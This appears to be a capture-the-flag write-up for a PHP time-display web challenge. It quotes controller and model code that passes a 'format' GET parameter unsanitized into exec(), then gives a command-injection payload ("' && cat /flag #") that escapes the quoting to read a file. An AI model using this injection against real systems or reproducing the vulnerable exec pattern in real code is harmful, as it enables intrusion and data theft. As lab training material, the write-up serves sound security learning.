If we click on whatโs the date/time we get it, so itโs time to analyze the source code:
If we analyze the Dockerfile, it seems that the flag is being copied in /flag:
If we inspect the controllers folder, we find TimeController.php:
<?php
class TimeController
{
public function index($router)
{
$format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
$time = new TimeModel($format);
return $router->view('index', ['time' => $time->getTime()]);
}
} This controller calls a model inside models subfolder, so letโs inspect TimeModel.php:
<?php
class TimeModel
{
public function __construct($format)
{
$this->command = "date '+" . $format . "' 2>&1";
}
public function getTime()
{
$time = exec($this->command);
$res = isset($time) ? $time : '?';
return $res;
}
}We can espace the command of the construct function by appending a ' #, so we can read the content of /flag by altering the petition with burp using the payload (url encoded): ' && cat /flag #
